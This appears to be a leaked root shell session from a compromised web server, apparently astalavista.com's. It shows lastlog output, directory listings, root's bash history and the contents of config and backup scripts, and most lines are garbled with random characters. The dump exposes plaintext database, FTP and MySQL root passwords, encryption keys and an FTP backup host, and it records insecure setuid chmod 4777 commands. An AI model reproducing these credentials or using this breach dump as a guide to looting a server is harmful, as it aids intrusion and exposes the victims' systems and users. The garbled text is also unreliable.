# X3 Q; E& J% ?# | | ___] | | | |___ | | \/ | ___] | | | #
. i6 D/ f1 w! |# g" s# #+ V t5 N2 G R
#####################################################5 [+ D, d7 Z+ t, Z! O' @. W
# #) B6 ~( N( U- M3 x; Y6 X b
# Admin Contact - 链接标记support@secureservertech.com #
: t, Y3 d: a3 i) X- o7 T8 ?# #0 b' u3 E0 P9 N
# Available ShortCuts #
. H2 n+ }, i! g9 ]8 ]' r c9 H# #7 C; M6 X- D$ S3 w3 A# Q
# nst - list active connections #
/ r$ J: @ `- [2 `. S' r" ^* j# ddos - shows how many times each ip is connected #
$ X. D; y0 a, v3 E* m Q$ u# ltr - restart the webserver #2 f+ ^0 J9 B! m' F
# phpc - edit the php config file #8 m$ i7 g: Q, O
# htc - edit the webserver configuration file #+ G# r! @5 K. I( }/ O* V- T. E: H8 r
# up - uptime #
8 [7 K6 B, ?- @# etd - edit the motd of the day file #
L* f4 L: C- U1 C* ~- O5 Z0 {1 N8 g2 _# htr - start and restart apache if needed #
$ x* V H% ^; g# F# syng - shows active SYN_RECV connections #' y: e+ @; Q) \1 Q8 L! d
# synd - syn flood blocker - “synd -h” for usage #
8 L. [+ q9 J/ D( [5 C#####################################################
/ d3 P' E' X3 _6 o# NOTES: #/ e3 u) L2 w+ q
# Last Upgrade - 12-08-2008 by JF #7 m# W$ j, D- u. ]
# My.cnf/Mysql Optimization - 1-28-09 #
- w- e* a! _0 z* e# #
$ B, a# M: X! o: q7 t' o# #4 W% H# q7 D2 e! D! f3 t
# #& z% A8 V. a$ D4 l/ T# B7 K
#####################################################' Y! D& R; ]- v8 A
" y0 R" ~& ~8 U( ?3 ~. C- _; q
sh-3.2# lastlog | grep -v Never+ J1 l' c1 p* e! x! L+ D+ ^
Username Port From Latest% J6 |8 V7 R% y+ _0 C% v
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20097 ]* @5 {7 D4 F! I6 {9 ~
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
* W+ r5 x) U2 @! {5 Q6 L) ycom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20090 T1 |4 x; q8 O( N1 k
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20096 ?3 F4 X& |: ~1 d: I: K
$ p! ~/ p0 ?- m* T, k2 {8 ]% p: [
sh-3.2# ls -la
, y* \9 i6 U) G/ ~total 453376: ?* r, e w8 o, R
drwxr-x— 15 root root 4096 Jun 4 08:40 .6 f) O9 f! B& ~
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
4 v& K# J5 W4 `" l( v! D6 O) @* x-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
, n6 c! I. s8 Y6 b6 W-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg( P& K3 o0 K) K ~1 c' ~
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
- Z* W/ {' ?0 ?& [' t1 C+ }-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout( E# y6 D% g- Z4 X' [
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
: \% e& M0 L& R7 \, A-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
; |) [2 ~1 N, r. v: p-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
- H; K0 e! Z) Z j4 I-rw-r–r– 1 root root 1327 Nov 29 2007 cert5 L f1 \1 m) b. n
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
! q: X7 ]% S; k$ b9 _( {# Bdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
7 C8 K4 S; w8 r-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc) Q7 [& D3 a2 h7 j7 k0 ~
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql; |1 w) y% C' w& u. F; c
drwx—— 2 root root 4096 Oct 28 2007 .elinks. X$ d, L3 T2 x5 M3 c. i
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
5 { Q2 L" ^( D-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2- d3 q; Q( P: P
-rw——- 1 root root 0 Apr 16 13:19 .history
. @: b( f, U( t9 j+ W) w' u! D, [# o-rw-r–r– 1 root root 16095 Sep 11 2007 install.log# Z9 E9 c4 H$ H) z W
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog7 M4 {) P5 H8 ]' i. k2 ]5 }
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh% u: {, {' e* t9 J+ E+ O+ e- k
-rw——- 1 root root 35 Jun 2 14:23 .lesshst4 t* I( O# R( @1 X
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp+ l2 c! @- I H% \
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec% E' Z+ b. M. M2 w
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
7 h8 [+ ?" ]: s P/ o' A/ {+ @-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
! n# F4 f7 O2 V-rwx—— 1 root root 760 Sep 18 2008 lp" @$ T0 Z! x" S: ]4 s
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.16 W$ T2 {' @6 h' M; l" S0 k
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz: t+ D* d" ~) D
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
O" G: N; ?8 i* `drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.95 P* D, V+ Q4 }
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
- H) w5 j1 l& {& m, Wdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
! t$ |0 _, R, h1 U/ m$ `; f: T-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
2 ^9 L9 D' ]0 s-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh3 N [0 [- Z. ?% {# i
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
" ~% J4 j+ j) L-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history! w- d1 B0 x8 j5 u/ }, K
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport, H% w( L" m" G" z3 ]
-rw——- 1 root root 41 May 20 2008 .mytop
: P1 T2 {3 C' `; X) w T; Edrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
( f1 q( l* K" ~) P6 V4 [# ~-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
( l" }, S4 r4 L+ Mdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
; x2 F9 [4 \3 w3 L6 U. @-rw——- 1 root root 1462 Sep 21 2007 opt.php% M2 N; D+ X" J, g, Q
-rw-r–r– 1 root root 3371 Sep 22 2007 p( I& H" D: p2 O
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz24 \ k+ X$ d B( T V( a7 u6 `
-rw——- 1 root root 1024 Feb 3 21:32 .rnd2 r9 P0 ^' C( } k* e) [
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr% M# C! U6 x# q, F2 r! ]
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
; K. A+ e: A' I9 F2 W: bdrwx—— 2 root root 4096 Oct 10 2008 .ssh
: B/ P- \3 b: S( Y' E-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
! P7 ]: A5 w+ N @2 z-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc8 c: K6 _9 b: ~
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
* D' ^% s3 R& m-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.14 o" C$ t) w3 p( e4 \
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp8 K$ f& Q1 f5 r: C: a( @; W
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
; p: { u2 k7 \5 Odrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.07 b, o. E/ u8 P' p3 ^
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz21 l3 C% O' H" B. m# [$ O- M1 D
-rw——- 1 root root 12997 May 16 2008 .viminfo
1 Y; C2 a& k2 g1 @9 ^7 B: l& O: \- J# |0 C, {% [ @
sh-3.2# cat .bash_history" l; k" A# L' |* @$ I: _5 V
[snip]
7 E' e' l3 z Z; S1 X! y3 o, C( Dwget cp4sst.com/sstlinux.tar.gz
' }) I- U; ~$ j9 v7 g) etar zxvf sstlinux.tar.gz3 x4 P/ d6 I' S, A! w
cd linux-2.6.27.10% x& @8 n+ r$ g! W, V, K Z
sh install.sh. ?& l7 W8 ]* T' I$ Q, K2 y s2 W
make bzImage ; make modules ; make modules_install ; make install- S" M6 |" {: @3 s& l
make clean
7 w% H2 T2 H# F& G& y' tservice mysqld restart
_* K- M) j1 U& \[snip]/ f( W4 }9 s) X4 X& z5 O
cd /usr/sbin/9 k! l8 W- ~: |0 ^+ i4 C
chmod 4777 traceroute
! X, h$ ]! N; F; n1 w! }# @8 Schmod 4777 ping3 Q; Q! N# ~$ Z% `
traceroute -I 链接标记[url]www.astalavista.ch[/url]
3 S, [" J5 R+ w/ y3 \% d }[snip]
+ H* Y. Q& J. L, Z) l6 w1 {! L( e: Xvi /etc/csf/csf.conf
5 V \( M5 X- `traceroute google.ch
* {, f8 H E: \. ]service csf restart) w8 X/ \( `" i
tracert google.ch
?+ C1 J) p( n( x/ dservice csf restart q. M6 q2 I( X$ m/ Q
traceroute 链接标记[url]www.google.ch[/url]4 s+ ?9 J- D0 v Y# r
tracert 链接标记[url]www.google.ch[/url]
+ c- O8 q, M* S6 U" u6 L/ P, Jtraceroute 链接标记[url]www.google.ch[/url]
/ j# A& S) a. p. w% ?+ z5 mlocate traceroute
, ]$ T5 n7 }( u! I" @! D$ ichown 4755 /bin/traceroute) t7 I6 }; U. N
chown 4777 /bin/traceroute# P& {/ m# U* p* X' V- h
locate ping" s0 Q4 x+ v/ N8 h) ]- T% l" t) i3 A
chown 4755 /bin/ping
! l( l5 q2 j9 V: Q. y c7 Q5 \$ ?chown 4777 /bin/ping
% H) t/ i( V: z0 tcd /bin/
0 O3 v5 y. B3 ~0 w4 @& p Els -ali | grep ping" d" y8 d! P+ s1 s% U
chown root ping& v/ Q0 F) W$ i
chmod 4755 ping
4 w: k* U+ w* F8 q+ zls -ali | grep traceroute9 o" h# r* w$ E6 k7 p. p
chown root traceroute
2 ?) y' l& ` |: t4 hchmod 4755 traceroute
( q! I t6 k! v7 W# L' q: x) B7 ?1 Zls -ali | grep traceroute
, C+ | i$ c) N4 L' Utraceroute -I 链接标记[url]www.google.ch[/url]/ f% W, ^* p5 T- @ y" v
traceroute 链接标记[url]www.google.ch[/url]
8 Z& j, v/ [- E7 y% Z* E5 Mwhois pmsantos.ch
. w; a2 O7 `# c[snip]
' e& x! n# b, ]! V6 \mysql -h com_contrexx2_live < /root/defaultp_ports.sql
. M- K: C8 ~8 J0 j$ o* pmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql! F/ Y; X1 M2 j/ X% n: b/ z$ Q- x
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
- S6 ~( a8 L: {: c, y1 G2 ~mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
- b" V' t/ B2 mtop
3 Y1 U4 W& B6 ?ping ssth.ch5 Q9 F( |/ q5 r& z1 Y
ping asdlkfaljgasd???ljg???lasj.ch0 ~7 B% U! T4 W8 W9 y0 |" D: w
ping asdlkfaljgasdlasj.ch8 p/ I; E4 X0 _0 G3 a& ^& @5 B0 q
ping 链接标记[url]www.ssth.ch[/url]
4 v, a. E, z$ x: S- h, p" \ping ssth.ch. T# Y; A! m, O# Q9 j# `
nslookup 链接标记[url]www.google.ch[/url]
! f+ f$ U% x2 U; F" h# ?+ P$ Mnslookup 链接标记[url]www.ssth.ch[/url]. v/ o% `. ~& E* G
man nslookup1 e' ^8 a- Z6 X% `1 w$ w* g$ @' ]
ping 链接标记[url]www.google.ch[/url]; u# W2 Q0 ]$ c: R! _3 i7 P, |
nslookup 链接标记[url]www.google.ch[/url]0 V6 n7 D& m" R. j; N' \
nslookup 链接标记[url]www.google.ch[/url]$ _, H* W( v8 F9 `
nslookup salfjasdlf.ch
! S! M: ^4 o' }5 U& S3 t! l7 i[snip]
! m1 u! A* j* T- {6 sopenssl passwd -1 sadf
, Q9 K. m; n4 f4 _) f; Iopenssl passwd -1 5cZNHstdTy* f& o3 |7 m O* O( A E5 E4 R2 @
mysql
& X( @1 t7 ^3 ?6 q. R% Vmysql2 f8 o! T5 {; k2 G/ C
locate proftp: m: p! _) _+ n5 }( u% @
vi /etc/proftpd.passwd
* }! _3 y, ^9 _2 ~service proftpd restart
# O+ ~! K7 p H+ c$ R# S: F; wlocate proftpd.conf
- z$ Y1 U$ X+ I' Yvi /etc/proftpd.conf
* p& H- \6 i1 S9 s, l5 }vi /etc/proftpd.passwd
1 o+ R) s# r: m, o' U. Sservice proftpd restart
$ u: Y9 B! {, F6 l9 Q+ O! @[snip] z! ]- M" Q, p2 A7 G+ |
/bin/sh /home/com/backup_system/backup.sh# j/ o N3 f$ n( R" t
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
% O3 @, e' w3 N, n6 Q/ E2 |mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
& r; l h2 ?. \( D3 omysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql% I/ @: H) C" _/ |% O, s
ls -ali
% h2 h3 k0 n9 h: imysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
4 M- c: i& q0 d4 Mmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
9 N3 I6 y& g7 M3 x/ z' Ccrontab -l, ?3 ^0 ?# q" p9 p7 ^, S9 [
crontab -l
" m" J, _+ ]9 R3 sphp -q /home/com/public_html/modifications/cronjobs/securitynews.php; D4 w1 h. h6 [% x$ `5 l
/home/com/public_html/modifications/cronjobs/exploits.sh
5 T, z* w9 Q! O: J# l" P6 j# [wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]" k) b( S/ b6 Y: r
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
* M! F- u1 F+ {- S, b8 J# Dcd lsws-4.0.33 F' U: P3 r- Q! q$ P! i
sh install.sh
0 C: s( f* b& X" q8 L( Cuptime
4 v9 o: ?* r2 O. @% l5 u- ~$ Yhdparm -tt /dev/sda
* n2 R- M7 I+ W( M. Ciostat
# U! f5 T& j1 S m+ s% Jyum install iostat
0 ^8 _" u( K) e0 Yiostat
0 o$ e S; O0 s# L& H1 {" H3 _6 Y0 [8 ~whereis iostat
# d( ~, D* k+ o+ w! U' m: Wyjm clean all
( }3 }- i) u; S$ d& v \) nyum clean all ; yum -y update5 J& _1 d, ?( H8 |1 j+ r3 {! d
iostat
4 z4 j+ V; b6 u! S: I& lyum install systat) o; Y( J+ x/ ~! t$ T, n3 H" U' h; o
rpm -qa | grep iostat
" I4 j/ v& P. S# i! i! z& S& d% Wrpm -qa | grep sysstat7 h! o: ~' ]4 H, H2 H/ q1 ^2 s1 Y, P
rpm -qa | grep systat
0 h9 z+ I0 Z# Zdmesg -c' `& \) K8 c& M$ a: i. l
sysctl -p
' } a! u" l0 }1 m+ c9 K1 @4 Funame -r
# A3 C+ I% V: }cd /usr/src
* m: Q! y, S3 ?- a' Xwget nix101.com/kernels/sstlinux.tar.gz
8 z9 z& w3 l0 D; \& Fshutdown -r now8 O/ l2 J! A2 U* `5 X
nano -w /boot/grub/grub.conf
% w1 e8 w. |0 a1 S4 O9 G7 {' \7 Q* Q! N, }8 V7 ]1 x1 P7 C# r' i) p R
sh-3.2# cat .my.cnf
4 c A$ D- e, \9 Q$ {[client]6 E2 A* ?6 O! X( g3 p5 r4 N
user=da_admin
3 ^! W. X# P& G. n7 k8 S B+ Vpassword=X9dctmRH
# b, f, B' @5 \
" b M9 K# B5 ~0 x x- y& Nsh-3.2# cat /home/com/backup_system/backup.sh
9 |; b; L% \. I# O' A#!/bin/sh; K& q" k4 M3 Z2 J6 O
#####################################################################2 B+ ^: ~( A5 s" Y
# #% i; i; u7 o$ h
# incremental backup for astalavista.com #4 f1 }4 |+ L" n( {1 Z: ]
# #2 \: F4 i* ?; F7 Q% {. h
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #; A+ P0 R5 C4 S9 D, l
# #
5 r$ K0 h. {7 K#####################################################################% p* t( O. A6 B/ l; d `
[snip]4 w7 Y& k6 f$ B. l
PROG_DIR=”/home/com/backup_system”;5 R* a/ X L7 v+ {
BACKUP_DIR=”/home/com/backups”;
1 m: H9 Z2 g! Z! kDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
% x, r. R2 W# v( b" Z( ~# ftp for synology backup server
$ V$ V; h D# b7 `3 b+ ZFTP_HOST=”212.254.194.163″;) A. x) P( Y# p& b
FTP_PORT=”21″;# e3 g3 R/ s; i: t7 u
FTP_USER=”astalavista.com”;
& Y/ H7 r1 X9 q: ?: cFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;' {% ~# \( i# A
FTP_DIR=”/astalavista.com”;/ I1 H0 n- D8 `
# database
0 y) Q. ^* j) B5 ?$ mDB_HOST=”localhost”;
3 ^0 `9 m7 h* S' E0 CDB_USER=”contrexxuser2″;* y; J4 v' ^ A0 ^7 O4 O6 ~
DB_PASS=”0fEYNZgXz1pKe”;
/ p. r: E, L+ z4 _: v8 _$ o' gDB_DATABASE1=”com_contrexx2_live”;/ g m9 y# O I
DB_DATABASE2=”com_contrexx2″;/ S2 h1 w3 j" a8 Z9 ?+ V# ~. T# I, g9 v
[snip]
# K1 R* N/ ?+ z F9 q: c5 c! hftp -in $FTP_HOST $FTP_PORT <<EOF
6 _5 @7 p8 ^$ M9 cquote USER $FTP_USER
8 y0 O( t! s/ E: Hquote PASS $FTP_PASS
' I+ A$ ?: k; ], pcd $FTP_DIR
! D. c; w3 H0 V" t" u& j( U1 @, Bput $DB_FULLNAME-SQL_Dump.tar
+ V1 O' S. \7 F$ M$ sput $BACKUP_FULLNAME-Public_HTML.tar m9 D; p9 u: z9 Q( b
close
; W9 u+ ?$ X4 D ]bye
( J- `2 H& e6 E8 zEOF
* T4 l/ i5 ]- g* h, R2 q# o
! U1 `% [6 F7 C6 ^# ssh-3.2# cd /home& G. j1 ]) r2 a9 F3 {
sh-3.2# ls -la
0 ?& c' q1 D, ?3 ctotal 1207 j1 y: h0 B% \; f" z+ S# p
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .; h0 N4 g0 H# w
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: G R# {* x+ G2 \( M5 ^drwx–x–x 9 admin admin 4096 Nov 28 2007 admin3 U0 K3 k* f. B! |4 H4 v8 k9 K3 R
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group+ z) \! g" P3 {2 k. M9 a
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user$ z! M+ J1 [! Z0 ~
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet( m8 |6 F& B5 C# U" A
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup3 w/ F+ K" E6 a0 D3 u" {
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
- g! P& ^1 C& X8 F8 l. t- Adrwx–x–x 10 com com 4096 Apr 28 12:40 com
$ e7 j* f7 ?/ |0 ~drwxr-xr-x 2 root root 4096 May 17 2007 ftp$ P( k/ A$ y5 A1 ]# T
drwx—— 3 jon jon 4096 Sep 21 2007 jon! R3 \$ O" Z9 P0 l8 K$ D
drwx—— 2 root root 16384 Sep 11 2007 lost+found" n1 c8 [" Z7 n* g2 T: U3 \4 `5 m
drwxr-xr-x 2 root root 4096 Sep 14 2007 my4 H ^: ~7 s) @% @; B0 R0 l) L; P7 M
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
; K9 \6 f) Y1 |+ z: ]5 J$ Ndrwx—— 2 jon jon 4096 Sep 15 2007 test* Z5 S* L5 w2 n9 z) ~
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
1 h2 K" _! B! S) W1 {+ ~# D4 ^: x* e3 w* ^- N% n# C. E' l; B
sh-3.2# cd admin
1 Q5 w: u, V& g, F- I r. Ksh-3.2# ls -la# N- X x+ G5 g3 v
total 1735896
* F6 K, ?: y: n% edrwx–x–x 9 admin admin 4096 Nov 28 2007 .
m# P, \ N. Z4 Udrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
! I: e! R$ Q$ F4 C7 c# q |1 Qdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
/ S8 Y& J2 W* Ldrwx—— 2 admin admin 4096 Sep 28 2007 backups7 O. s$ n" e6 Y+ \9 K' c1 X# U
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
- r$ Z* v/ R: p# P-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout# N/ }/ x' @+ S, L- Q V
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
+ I, P" k: e, o* H-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc, b {. @+ |" ]9 \% C# z2 S
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups% Z" C# b. E9 D% {7 V! {7 X
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
4 H, J" S# E" ndrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
( Z+ g" R/ n' _9 [-rw-r–r– 1 root root 24 Sep 21 2007 info.php
: p9 l$ m% b, B9 T3 Idrwx—— 2 admin admin 4096 Sep 21 2007 mail' b1 o2 O" Q$ O, J
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
' X8 N5 s- L' A-rw-r–r– 1 root root 887 Nov 28 2007 server.key1 v: F! F* I4 B" ]6 Z) |& Y' P P" z
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
! U5 n' U# n$ d-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
3 j; ~2 b6 [( f" S3 l9 x5 t6 udrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups! r$ \5 a7 `1 f6 u( h
# Q% A3 Z8 B' F/ Z* S
sh-3.2# ..2 f- H. q5 P. B, F, s; r- m
sh-3.2# cd jon
6 U* D/ m/ n6 W8 [sh-3.2# ls -la# j M, k( i! P4 Q! u( Q4 B: M7 X
total 36/ s. v% b( H) c! K5 r' A0 _+ X
drwx—— 3 jon jon 4096 Sep 21 2007 .
: ?( j4 j# L+ [ ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
( X0 B1 G% o! p7 i7 d-rw——- 1 jon jon 53 Sep 21 2007 .bash_history( w, f" O& H% g: W3 f" T- Y( m: K
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout7 L) |' w8 G$ ?+ g# f& v' C z3 w$ Q
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile h; ^1 u2 G8 n1 j! }( E* i
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
' I+ t7 v; x4 b0 V1 v8 V/ h! w-rw-r–r– 1 root root 24 Sep 21 2007 info.php
, s4 Z. @% P$ `drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html% c% F. O: A8 ]+ v0 V+ }
4 a' \) M* T% o! Tsh-3.2# cd .." n |% ]) o3 [
sh-3.2# cd test
+ a* V' o& R0 a) r5 ~sh-3.2# ls -la
! t7 a) y, E) utotal 48
" S9 I7 z) _) O G% O3 Y! B$ Y( ?" ]: ?drwx—— 2 jon jon 4096 Sep 15 2007 .
: s! A1 g! L: B* kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..: [" R- q+ X6 S) s
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
# \: k- X8 l: a5 v' m-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout8 q3 W" S" p+ x$ U* g! k
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile- }- G3 U7 w3 ~, A* d
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc- Q9 z. n: v S0 M
sh-3.2# cat .bash_history
- y/ z# H$ I' H$ O# Y2 k/usr/bin/mysqladmin -u root password PoliuJhytg67% G/ q; o6 K5 ?: l" E
' P9 a. Z, j' D% E% |2 b+ Tsh-3.2# cd ..
# z0 y3 i' g) t( |3 }- Nsh-3.2# cd astanet% A. E+ O9 F& t/ E$ o% T
sh-3.2# ls -la3 T% `* E w: U$ ~
total 52
. P' n. [4 o: E7 S0 Ndrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .8 R( R) t4 Q$ D0 h3 ]" V% t
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ g! k; ^* ^( x4 ddrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth9 Q/ h# H3 P- T8 K
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
& v2 ?! C* U# A-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
' v. m P' W+ E& E-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile8 L7 R5 j! I: I
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
1 c7 E/ X" i g" ]drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
8 V1 v& _) a) sdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
: n0 t( e& n1 N; udrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail1 Y N6 Z) t, K9 G- Q) w$ r# |3 v# A2 z
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history- A1 n+ Q( b6 E* O7 z
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html7 A2 e! C+ L O6 {2 N! Q6 N
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
4 |# j3 W. P/ F' S/ u9 ^2 q6 Q3 I9 E2 i3 K2 h3 Y
sh-3.2# cd auth/+ _) a% M; j3 M6 K
sh-3.2# ls -la: k* O& y& D" Y! g
total 28
. E: K9 U1 F" e0 c3 Gdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
$ w; x: I( I! H7 [. F, ]+ zdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
' C4 Q# \9 @; W. E-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php' ]) D$ ^" C* O$ D1 r- j
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
$ `3 R) d4 v' U* I-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd+ ^( |" J$ u/ |7 B" k( @( t
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting% _2 Q! _3 r) {: D
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
0 E/ z1 o X7 v2 l0 f. k6 K% z% f- Q. @* U4 I/ y- _7 H
sh-3.2# cat hackercontest.config.inc.php
/ G) S' M& d& b( B4 U6 D<?PHP
% f5 E* |4 }1 h. H0 d8 h/ @6 ]( t// Variabeln f?r Verbindung zur Datenbank //" y: Q* N, Z& \: p" o
$conxHost = ‘localhost’; // MySQL hostname
" ]' i) E! g0 B$conxUser = ‘hackercontest’; // MySQL user$ y0 B1 L3 {# u1 Y2 p
$conxPassword = ‘K6m@7dUc’; // MySQL password
1 e& ~ Y# r0 u& d: `; ~& t0 }: G$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish0 W- K6 P3 \( g# U5 [+ |8 S2 G" ~
?>* U9 V0 ?( n& @! I+ f
sh-3.2# cat hosting.config.inc.php
1 G# n6 b r4 a d* A3 s<?PHP
% T+ I! X; r) C; `// Variabeln f?r Verbindung zur Datenbank //. a, C& p6 ? b4 y- q1 M( I
$conxHost = ‘localhost’; // MySQL hostname
) m* C4 q5 J3 s$conxUser = ‘hostinguser’; // MySQL user, y" H7 N( w9 g0 t
$conxPassword = ‘cXvB3981′; // MySQL password% o# B, E w+ U0 ]/ K j1 ^, h
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
+ g) M' g- f. n) @?> w2 u5 m; K4 ?7 w, [3 R3 t
. [, |( ?& o6 q6 U8 S, |- Q2 Ash-3.2# cd ..
; V$ y/ n4 h) }4 j* Q6 t, Nsh-3.2# cd com( D, y& W G" I0 `6 n" e4 O
sh-3.2# ls -la
/ T* u% Q0 f$ s+ A+ }; A3 Stotal 141208! B* E5 ~% y! X+ q
drwx–x–x 10 com com 4096 Apr 28 12:40 .
( Q6 a* h( ?9 j/ F$ sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..% j* j/ c0 P6 q! G) n! [3 A
drwx—— 2 com com 4096 Jun 4 04:04 backups* w% K4 }" V1 ]1 j* H, Y* v
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql1 a; I' F# \7 k& C+ {$ q
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
